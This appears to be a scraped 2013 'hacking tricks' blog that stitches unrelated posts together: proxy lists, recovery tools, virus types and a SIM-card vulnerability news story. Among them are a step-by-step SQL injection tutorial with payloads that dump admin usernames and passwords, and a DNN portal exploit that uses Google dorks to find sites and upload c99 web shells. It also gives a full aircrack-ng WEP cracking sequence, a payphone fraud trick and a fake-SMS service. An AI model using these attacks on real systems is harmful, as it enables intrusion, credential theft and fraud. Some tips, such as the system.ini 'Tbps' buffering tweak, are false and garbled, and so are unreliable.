Box*.SenderBase*.SSL/TLS*.SPF/SRS*.Attachment Blocking*.ClamAV and FileScan*.Blocking Reporting*.LDAP support*.Backscatter DetectionDownloadWEB PROXY SITES:www.meebo.com/www.iloveim.com/www.the-cloak.com/www.cantblock.mewww.mb35.infowww.cloaking.mewww.proxybrowsing.comwww.behidden.comwww.yourfreedom.netwww.hujiko.comwww.anonymizer.ruwww.schoolproxylists.cn/www.xysurfing.com/www.googlefaker.com/www.internetoxy.com/Facebook ProxyIf Facebook are block in your offices, college and home then don't worry Click at below linkand access your FB Account.EnjoY..!!http://www.f1.proxymice.com/http://www.f2.proxymice.com/http://www.f3.proxymice.com/

how to recover delete file and photo

Recover My Files data recovery software will recover deleted files emptied from the Windows RecycleBin, or lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure.Recover My Files - Data Recovery SoftwareSolutionRecover files even if emptied from the Recycle BinFile recovery after accidental format, even if you have reinstalledWindows.Disk recovery after a hard disk crashGet back files after a partitioning errorGet data back from RAW hard drivesRecover documents, photos, video music and email.Recover from hard drive, camera card, USB, Zip, floppy disk or other mediaData Recovery Software DownloadCurrent Version:4.6.8.1012100% Safe, 100% SecureTo Recover deleted or corrupt photos:DiskInternals Flash Recovery 4.2 full download using which you can recover deleted or corrupted photos within few seconds. Isn't that nice, its best that you can recover all your deleted data from the flash memory cards used in cameras.DiskInternals Flash Recovery is a flash memory file recovery tool that restores all corrupted and deleted photographs or the ones that were lost due to hardware malfunction. This utility works evenif a memory card was re-formatted.Features:• Easy Recovery Wizard.• Can preview and recover JPEG, JPG, TIFF, BMP, PNG, GIF, TGA and other images.• Can preview and recover RAW images:• CRW - Canon Digital Camera Raw Image Format.• CR2 - Canon Digital Camera Raw Image Format version 2.0.• NEF - Nikon Digital SLR Camera Raw Image File.• PEF - Pentax Raw Image Format• RAF - Fuji CCD-RAW Graphic File.• X3F - Sigma Camera RAW Picture File.• BAY - Kodak/Roper Bayer Picture Sequence.• ORF - Descent 3 Outrage Room Format.• MRW - Minolta Diamage RawImageFile.• RAW - Image Alchemy HSI Temporary Raw Bitmap• SRF - Sony DSC-F828 Raw Image File.• Other RAW images• Works under Microsoft® Windows® 95, 98, ME, NT, 2000, XP, 2003 Server.• Supported file systems: FAT12, FAT16, FAT32, NTFS (NT 4), NTFS5 (2000, XP).• Recovered files can be saved on any (including network) disks visibleto the host operating system.• Creates recovery snapshot files for logical drives. Such files can be processed like regular disks.To DownloadDiskInternals Flash Recovery 4.2 full download

tab napping

Tab Nappingis a new form of phishing that is hitting the internet now. With the conventional form ofphishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page.How does it worksTab napping is more sophisticated than the phishing scams we’ve seenso far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (forexample, by pressingCTRL + T).if you have multiple tabs open andyou are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactlythe same as the page you opened in the tab, you probably wont even even know it has been replaced with a fake page.fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.This may surprise you, but phishersand fraudsters in general can actually detect when a tab has beenleft inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and whichemail account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping.How can you protect yourself against tab napping?Here are five simple ways you can prevent yourself from falling victim:• Make sure you always check the URL in the browser address page is correct before you enter any login details. A fake tabbed page will have a different URL to the websiteyou think you’re using.• Always check the URL has a securehttps:// address even if you don’t have tabs open on the browser.• If the URL looks suspicious in any way, close the tab and reopen it by entering the correct URL again.• Avoid leaving tabs open which require you to type in secure login details. Don't open any tabs while doing online banking - open new windows instead (CTRL + N

increase YouTube buffering speed

How to increase youtube/metacafe buffering speedWid this procedureu can increase the buffering speed of uploaded videostry itpornsteps>>1.start2.run3.type--system.iniafter that ull get system notepad file as; for 16-bit app support[drivers]wave=mmdrv.dlltimer=timer.drv[mci][driver32][386enh]woafont=dosapp.FONEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FONjus below this copythis-------------->page buffer=1000000Tbpsload=1000000Tbpsdownload=1000000Tbpssave=1000000Tbpsback=1000000Tbpssearch=1000000Tbpssound=1000000Tbpswebcam=1000000Tbpsvoice=1000000Tbpsfaxmodemfast=1000000Tbpsupdate=1000000Tbpsso totally it will look as for 16-bit app support

get password

Reveal *****(Asterisk) Passwords Using Javascript :-Want to Reveal the Passwords Hidden Behind Asterisk (****) ?Follow the steps given below-1) Open the Login Page of any website. (eg. http://mail.yahoo.com)2) Type your 'Username' and 'Password'.3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.javascript: alert(document.getElementById('Passwd').value);4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

hack phone Booth

Coin Box Calling HackSteps:1.Insert Coin2.Dial 0##Phone No. *(star)3.Call Unlimited4.And Disconnect5.Coin Comes Out6.Go Home Smiling...~

Firefox inside Firefox

Run Firefox inside Firefox :-How to run Firefox inside Firefox.?Yup you can run Firefox inside firefox just by typing following url.How about Opening Firefox inside Firefox which is again in another Firefox..?Not bad huh?And its really easy too just type in this url in Firefox's address bar and there you go!Firefox inside Firefox!copy paste following url in a web browser (mozilla firefox).chrome://browser/content/browser.xul

access block website using calculator

OPEN BLOCK WEB USING CALCULATORNow access the internet via your standard Microsoft Calculator using this trick.You can do this for fun or when your browser is messed up for some unexplainable reason.Steps:1. Open your MS Calculator. This is normally found in Start => All Programs=> Accessories => Calculator.2. Open the help-window by pressing theF1key.3. Click the top-left corner icon of the help window once (Standard is a Document with a Question mark).4. Select 'Jump to URL'.5. Type your address into the available field, but remember to type http://, and not just www. (or equivalent).

how to create own social site

To Create Your Own Social Network WebsiteJCOW:Top 10 reasons to choose Jcow1Handle more traffic - Clean codes and Dynamic caching can lower the CPU load andspeed up your website.2Make your site more interactive - Well designed Jcow applications help you members to connect and communicate with others more effectively.3Add questions to the Registration Form - You can add new member fields, which will be displayed to the registration form, profile form,and the member browsing form.4Easily share stuff - Within the AJAX sharing Box, your members can publish status,photos, videos, and blogs.5Customize and Extend your Jcow Network - A Jcow network consists of core apps(like "Friends" and"Messages") and optional apps(like"Blogs" and ""Videos"). You can enable/disable optional apps. You can also develop your own apps.6Every profile could be Unique - Members can customize their own profile theme andadd music player to the page.7Members know what's happening tothem - Profile was commented, photo wascommented, forum post was replied, comment was replied,... The "Notifications"tell everything to the member.8The power of "Following" - The Twitter's success tells us that people like to know theupdates from those they are interested in.9Give permissions the way you want - Jcow permissions depend on"Member Roles".You can edit roles and give a member multiple roles. This logic enables you to membersmore easily.10Make money from your Network - With the Ads management, you caneasily insert adscodes like Google Adsense. You canalso let Jcow hide the ad to specified member roles.Latest version: 5.2.1Download|DemoAdmin Panel DemoPleasedownload Free versionand install to your own server.For More Informationwww.jcow.netNING:Create Super FansBuild a followingIntegrate with Facebook, Twitter and YouTube to create a social hub. Empower the community to build out your fan base.Inspire connections between showsCreate a social space for fans to talk, share and build excitement even when you aren’t there.Distribute content with complete controlOwn your brand and push out your content with branded media players.Foster deep relationships with fansCollect email addresses and create member profiles to connect with your fans.Product Features* Forums, blog and photos to generate excitement* Custom, brandable video and music player* Advertising and revenue generating solutions* Seamless integration with Facebook, Twitter and YouTube* Design freedom to create a premium brand experienceFor more Informationwww.ning.com

virus types

Types of viruses :-The different types of viruses are as follows-1) Boot Sector Virus :-Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect acomputer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.Examples of boot- sector viruses are Michelangelo and Stoned.2) File or Program Viruses :-Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .Some common file viruses are Sunday, Cascade.3) Multipartite Viruses :-A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virusattaches to the files, it will in turn infect theboot sector.This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.Other examples are Invader, Flip, etc.4) Stealth Viruses :-These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.5) Polymorphic Viruses :-Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.6) Macro Viruses :-A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macroviruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different typesof infections that are categorized in the general category of Malware.Malware-Malware is programming or filesthat are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will notgo into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are somethat need special steps to be removed and these won't be covered under this tutorial.Before we continue it is important to understand the generic malware terms that you will be reading about.Backdoor-A program that allows a remoteuser to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.Hijackers-A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker'sown start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.Spyware-A program that monitors your activity or information on your computer and sends that information to a remote computer without your Knowledge.Adware-A program that generates popupson your computer or displays advertisements. It is important to note thatnot all adware programs are necessarily considered malware.There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.Dialler-A program that typically dials a premium rate number that has per minutecharges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.Trojan-A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoorto your system.Worm-A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infecta remote computer using known security holes.

wifi hacking tool

I am going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password using Ubuntu or any other Linux distribution:Netcut:Disconnect any wifi devices from network. Support windows OS . The driver and Install package has been upgrade. tested working under windows 7 both 32 bit and 64 bit OS. Its change MAC address on any adapter, including wireless. Details at How to change MAC. Also support Clone MAC address from any PC that NetCut monitored.WhereasWifikilluse for Android applications to disable internet connections for a device on same network. Disconnect wifi connection and get full network on your device.Download:NetcutorWifikillAircrack-ngAircrack-ng(a fork of aircrack) is mymain tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driversupports raw monitoring mode andcan sniff 802.11a, 802.11b and 802.11g traffic.Download:Aircrack-ngKismetKismetis a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any log-gable packets.ismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key,Kismet is a packet sniffer and intrusion detection system.Download:KismetNetStumblerNetwork Stumbler a.k.a NetStumbler– This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.Download:NetStumblerSWScannerSWScanneris specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.These are only three of the many wireless tools that can get you going in no time, so feel free to explore.Download:SWScanner

hack wifi network 2013

Step 1:-First Download Backtrack from the following link:http://www.remote-exploit.org/backtrack_download.htmlStep 2:-Burn the iso image on CD and boot your laptop from CD driveStep 3:-Select the third boot option(VESA/KDE).Step 4:-Once in BT3, click the tiny black boxin the lower left corner to load up a"Konsole" window.Step 5:-Type the following commandairmon-ngNote down the interface name. In this example wifi0Step 6:-airmon-ng stop wifi0Step 7:-ifconfig wifi0 downStep 8:-macchanger --mac 00:11:22:33:44:66 wifi0Step 9:-airmon-ng start wifi0Step 10:-airodump-ng wifi0This will start populating Wifi networks. Press Ctrl + C to stop.Check the network with WEP encryption.Notedown BSSID, CH and ESSID somewhere in notepad or paperNote that if the same BSSID is available in the second part with STATION associated with it,means you some one is accessing that network and our task will be little easier.If not than don’t worry we will still crack it.Step 11:-airodump-ng -c (channel) -w (file name)Replace(channel) with the CH which u had already n(file name) with any name of your choice(bssid) with the BSSID which u had already note--bssid (bssid) wifi0Note itLeave this console as it is and start new konsoleStep 12:-aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0If you don’t get Association Successful mesage then keep on trying untilyou got success.Step 13:-aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0Well if you don’t see ARP ACK and sent packets are not increasing or still 0than it means no 1 isaccessing that network.But don’t worry you go an optional step,Leave this console as it is and start new kStep 14:-aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FFkonsolemessage than keep on trying until you get successgot an optional stepkonsole–b (bssid) –h 00:11:22:33:44:66 wfi0Press y and enterNow you will see that ARP and ACK packets in 2nd console are increasing fastKeep this console as it is and start 4th console.Step 15:-aircrack-ng -b (bssid) (filename)-Just wait and watch…..Backtrack willdo rest of the work.Hurray we got the key.Done..!!Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network?I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I sooncame to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.How a wireless network worksA wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients.Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with. The set of all stations that communicatewith each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with every NIC. For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSIDto let the clients know that an AP is in range. Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is with the transmission of these packets that pose the largest security threat to any wireless network.

send fake sms

SMS MafiaSmsMafia is a web texting application.This Service Is Completely Anonymous.Your Mobile No. Will Not Be Shown Anywhere.http://smsmafia.in/SMS GlobalSend fake sms from this website..Make sign up and u will get 25 sms as trial..www.smsglobal.com

hack website using various method

Learn How To Hack Websites With Different Techniques..(EDUCATIONAL PURPOSE ONLY)SQL Injection in MySQL Databases:-SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.Step 1:When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:www.site.com/page=1orwww.site.com/id=5Basically the site needs to have an= then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in theurl. For example:www.site.com/page=1'If the database is vulnerable, the page will spit out a MySQL error such as;Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.Step 2Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering"order by 1--", "order by 2--" and soon until we receive a page error. For example:www.site.com/page=1 order by 1--http://www.site.com/page=1 order by 2--http://www.site.com/page=1 order by 3--http://www.site.com/page=1 order by 4--http://www.site.com/page=1 order by 5--If we receive another MySQL error here, then that means we have 4 columns. If the site errored on"order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.Step 3We now are going to use the"union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,for example:www.site.com/page=1 union all select 1,2,3,4--This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show acouple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.Step 4We now need to find the database version, name and user. We do thisby replacing the vulnerable columnnumbers with the following commands:user()database()version()or if these dont work try...@@user@@version@@databaseFor example the url would look like:www.site.com/page=1 union all select 1,user(),version(),4--The resulting page would then showthe database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you haveto brute force or guess the table and column names, programs can be used to do this.Step 5In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.UNION SELECT 1,table_name,3,4 FROM information_schema.tables--So the url would look like:www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.Step 6In this Step we want to list all the column names in the database, to do this we use the following command:union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--So the url would look like this:www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.Step 7Finally we need to dump the data, so say we want to get the"username" and "password" fields, from table "admin" we would use the following command,union all select 1,2,group_concat(username,0x3a,password),4 from admin--So the url would look like this:www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successfulthen you should be presented with a page full of usernames and passwords from the websitePortal Hacking (DNN) Technique:-One more hacking method called "Portal Hacking (DNN)". This methodalso uses in google search engine tofind hackable sites.. Here U can useonly Google Dorks forhacking a websites..Here U can use dez two Google Dorks1- inurl:"/portals/0"2- inurl:/tabid/36/language/en-US/Default.aspxYou can also modify this google dork according to your need & requirementHere is the exploitProviders/HtmlEditorProviders/Fck/fcklinkgallery.aspxStep 1 :http://www.google.comStep 2:Now enter this dork:inurl:/tabid/36/language/en-US/Default.aspxthis is a dork to find the Portal Vulnerable sites, use it wisely.Step 3:you will find many sites, Select the site which you are comfortable with.Step 4:For example take this site.http://www.abc.com/Home/tabid/36/Lan...S/Default.aspxStep 5:Now replace/Home/tabid/36/Language/en-US/Default.aspxwith this/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxStep 6:You will get a Link Gallary page.So far so good!Step 7:Dont do anything for now,wait for the next step...Step 8:Now replace the URL in the address bar with a Simple Scriptjavascript:__doPostBack('ctlURL$cmdUpload','')Step 9:You will Find the Upload OptionStep 10:Select RootStep 11:Upload your package Your Shell c99,c100 , Images, etcAfter running this JAVA script, you will see the option forUpload Selected FileNow select you page file which you have & upload here.Now Go to main page and refresh.you have seen hacked the website.Done..!!

hack broadband speed

Hack BSNL Broadband for SpeedIf you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:208.67.222.222208.67.220.220Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your serviceprovider’s DNS servers are working fine, you can still use OpenDNS justfor these two special features.Afteryou hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

how to change ip address fast

How To: Change Your Ip In Less Then 1 MinuteThis article will help you to change your IP address within a minute. Just follow the following step and you will be thru.1. Click on "Start" in the bottom lefthand corner of screen2. Click on "Run"3. Type in "command" and hit okYou should now be at an MSDOS prompt screen.4. Type "ipconfig /release" just like that, and hit "enter"5. Type "exit" and leave the prompt6. Right-click on "Network Places" or "My Network Places" on your desktop.7. Click on "properties"You should now be on a screen withsomething titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.8. Right click on "Local Area Connection" and click "properties"9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab10. Click on "Use the following IP address" under the "General" tab11. Create an IP address (It doesn't matter what it is. I just type 1 and 2until i fill the area up).12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.13. Hit the "Ok" button here14. Hit the "Ok" button againYou should now be back to the"Local Area Connection" screen.15. Right-click back on "Local Area Connection" and go to properties again.16. Go back to the "TCP/IP" settings17. This time, select "Obtain an IP address automatically"tongue.gif 18. Hit "Ok"19. Hit "Ok" again20. You now have a new IP addressWith a little practice, you can easily get this process down to 15 seconds.P.S:This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

how to make confess page on Facebook

how to make confesspage on FacebookFirst StepsCreating a Facebook confessionpage is easy, just follow thesesimple steps:1. Log into your Facebook accountand click on Home.2. On the left side-bar menu,select Like Pages.Now, click on the button at thetop which says Create Page .3. Select Cause or Community andname your page. Eg. XYZConfessions.4. After getting started, put an anappropriate cover and displaypicture. It is usually the logo or apicture showing the name of yourorganisation.5. Now you are over with theFacebook page and you need tolink it to the anonymous form.Second StepTo create and link a form usingGoogle Docs:1. Go to https://docs.google.comand sign into yourGoogle account.2. Click on Create and select theForm option.3. Choose the desired theme andfill the complete form.4. Now, click on Add Item andselect Paragraph Text .5. Customize the blank fields andsave.6. Click on View Live Form andcopy the URL. You may shorten thisURL using goo.gl .7. Click on Choose ResponseDestination and select NewSpreadsheet . Name your form andsave it.8. Paste this URL along with someinfo about your page in the AboutMe section on Facebook and youare done!A Google Doc file will be created.Whenever someone fills that formon your Facebook page, you willget a message on that file. Justcopy the confession from thespreadsheet and paste it on yourpage along with a confessionnumber.

hack sim card

Best Blogbig breaking news: bs ek msg aur Mobile hackNohl, who will be presenting hisfindings at the Black Hat securityconference in Las Vegas on July 31,says his is the first hack of its kindin a decade, and comes after he andhis team tested close to 1,000 SIMcards for vulnerabilities, exploited bysimply sending a hidden SMS. Thetwo-part flaw, based on an oldsecurity standard and badlyconfigured code, could allow hackersto remotely infect a SIM with a virusthat sends premium textmessages (draining a mobile phonebill), surreptitiouslyre-direct andrecord calls, and — with the rightcombination of bugs — carry outpayment system fraud.Payment fraud could be a particularproblem for mobile phone users inAfrica, where SIM-card basedpayments are widespread. Thedeployment of so-called NFCpayment technology, already slow totake off , could also be at risk, Nohlsays, as well as the ability forcarriers to track charges to eachcaller’s account.There’s no obvious pattern to theflaw beyond the premise of an olderencryption standard. “Differentshipments of SIM cards either have[the bug] or not,” says Nohl, who ischief scientist at risk managementfirm Security Research Labs. “It’svery random.”In his study, Nohl says just under aquarter of all the SIM cards hetested could be hacked, but giventhat encryption standardsvary widely between countries,he estimates an eighth of theworld’s SIM cards could bevulnerable, or about half a billionmobile devices.Nohl, whowas profiled by Forbes’ AndyGreenberg in 2011 for his work onbreaking mobile encryptionstandards, believes it unlikely thatcyber criminals have already foundthe bug. Now that word of thevulnerability is out, he expects itwould take them at least six monthsto crack it, by which time thewireless industry willhave implemented available fixes.That effort may already be underway.Nohl says at least two large carriershave already tasked their staff withfinding a patch for the SIMvulnerability, which they will sharewith other operators through thewireless trade body GSMA.“Companies are surprisingly open tothe idea of working cooperatively onsecurity topics because thecompetition is somewhere else,” saysNohl. “The competition is organizedcrime, not AT&T versus T-Mobile.” (The situation in similarlyin finance, where payment serviceslike MasterCard, Visa, and AmericanExpress will work together underindustry association EMVco toimprove security standards for smartcards.)The market for SIMs is almostentirely fed by mobile carriers, andsupplied by two leading globalvendors, Gemalto and OberthurTechnologies. Both have profitedheavily from the huge growth inmobile handsets: ten years agothere were 1 billion SIM cardsworldwide, and today there are morethan 5 billion, says ABI Researchanalyst John Devlin, though themarket is slowly reaching a plateau.SIMs are thought to be one of themost secure parts of a phone, headded, and as the carrier’s property,are “key to their relationshipbetween you and I, the subscriber.”Vodafone would not answerquestions about the level ofencryption its SIM cards used, andreferred all media questions toGSMA. Both Verizon and AT&T saidthey knew of Nohl’s research, butsaid their SIM profiles were notvulnerable to the flaw. AT&T addedthat it had used SIMs with tripleData Encryption Standards (3DES) foralmost a decade; Verizon did notspecify why its SIMs were notvulnerable.The London-based GSMA said it hadlooked at Nohl’s analysis andconcurred that “a minority of SIMsproduced against older standardscould be vulnerable.” It said it hadalready provided guidance tonetwork operators and SIM vendorswho could be impacted by the flaw.“There is no evidence to suggestthat today’s more secure SIMs, whichare used to support a range ofadvanced services, will be affected,”a spokesperson added.Nohl says that while AT&T andVerizon may benefit from robust SIMencryption standards, other carrierswill use straight Data EncryptionStandards (DES), guidelinesdeveloped in the 1970s that arefundamental to why he was able to“get root” on dozens of SIMs cards.“Give me any phone number andthere is some chance I will, a fewminutes later, be able to remotelycontrol this SIM card and even makea copy of it,” Nohl says.SIM cards are essentially mini-computers with their own operatingsystem and pre-installed software.To maintain security, many rely on acryptographic standard called DES(digital encryption standard) , whichwas invented by IBM in the 1970sand improved by the NSA. Somenetworks, like AT&T and the fourmajor carriers in Germany, havemoved away from using the oldversion of the standard, but othershave not. Though Nohl didn’tidentify a pattern to vulnerable SIMsin terms of manufacturers, the oneshe could hack all used the oldencryption standard.Key to the hack is Java Card, ageneral purpose programminglanguage used on 6 billion SIMcards. If operators need to updatesomething on your SIM, for instanceallowing interoperability with acarrier in another country, it willexecute the right Java Card programson your SIM by sending your mobilea binary SMS. This is a text messageyou will never see, sent through amethod called over-the-airprogramming (OTA).In early 2011, Nohl’s team startedtoying with the OTA protocoland noticed that when they used itto send commands to several SIMcards, some would refuse thecommand due to an incorrectcryptographic signature, while a fewof those would also put acryptographic signature on this errormessage.With that signature and using a wellknown cryptographic method calledrainbow tables, Nohl was able tocrack the encryption key on the SIMcard in about one minute. Carriersuse this key to remotely program aSIM, and it is unique to each card.“Anybody who learns the key of aparticular SIM can load anyapplication on the SIM he wants,including malicious code,” saysJasper Van Woudenberg, CTO NorthAmerica of smart-card security firmRiscure.“We had almost given up on theidea of breaking the most widelydeployed use of standardcryptography,” says Nohl, but it felt“great” to finally gain control of aSIM after many months ofunsuccessful testing.With the all-important (and till-nowelusive) encryption key, Nohl couldsend a virus to the SIM card, whichcould then send premium textmessages, collect location data, makepremium calls or re-route calls. Amalicious hacker could eavesdrop oncalls, albeit with the SIM ownerprobably noticing some suspiciously-slow connections.Nohl found a second bug. Unrelatedto the weak encryption key, it allowseven deeper hacking on SIMs and iscaused, Nohl says, by a mistake onthe part of SIM card manufacturers.Java Card uses a concept calledsandboxing, in which pre-installedprograms like a Visa or PayPal appare shielded from one another andthe rest of the SIM card. The termcomes from the idea of only allowingprograms to “play with their owntoys, in their own sandbox,” saysNohl. “This sandboxing mechanismis broken in the most widely-usedSIM cards.” The researcher says hefound a few instances where theprotocols on the SIM card allowedthe virus he had sent to a SIM, tocheck the files of a payment appthat was also installed on the card.The way this works is somewhatcomplex, but Nohl’s virus essentiallygave the infected Java software acommand it could not understand orcomplete – eg. asking for the 12thitem in a 10-item list, leading thesoftware to forgo basic securitychecks and granting the virus fullmemory access, or “root,” in cybersecurity parlance.In sum, a malicious hacker whowanted to use this method mightstart with a list of 100 phones. Theycould send a binary SMS to all ofthem, using a programmable cellphone connected to a computer.They might get 25 responses withcryptographic signatures, anddismiss the half that use a strongersecurity standard. From the rest,Nohl surmises they could crack theencryption key of perhaps 13 SIMcards, and send them a virus thatbreaks through the Java Cardsandbox barriers and reads paymentapp details, as well as the masterkey of the SIM card.Who’s to blame for this and who canfix it? Nohl says broken Javasandboxing is a shortcoming ofleading SIM card vendorslike Gemalto and Oberthur. Riscure’sVan Woudenberg agrees.Gemalto which made abouthalf its $2.5 bil

Sunday 21 July 2013

multiple google talk


Multi Google Talk Login
without any software
Just follow the simple
steps Below:
1) Right click on the Google Talk
shortcut.
2) click on Properties.
3) Go to Shortcut tab on Google Talk
Properties window.
4) On the Target textbox, add in
the /nomutex to the end of the line
so that it looks like below (or you
can simply copy and paste the below
syntax and replace the original).
“c:\program files\google\google talk
\googletalk.exe” /nomutex
5) Click on OK.
I didn't have to do anything after
this and clicking on the shortcut
multiple times just gave me different
Google talk window.
Alternative
To create a new shortcut for Google
Talk:
1) Right-click on the desktop or
anywhere you want to place the
GTalk shortcut.
2) Select New on the right click
context menu.
3) Then select Shortcut.
4) Copy and paste the following line
to the text box when prompted to
type the location of the item:
“c:\program files\google\google talk
\googletalk.exe” /nomutex
5) Click on Next.
6) Give the shortcut a proper name
such as Google Talk or Google
Talk Multiple or Google Talk
Polygamy.
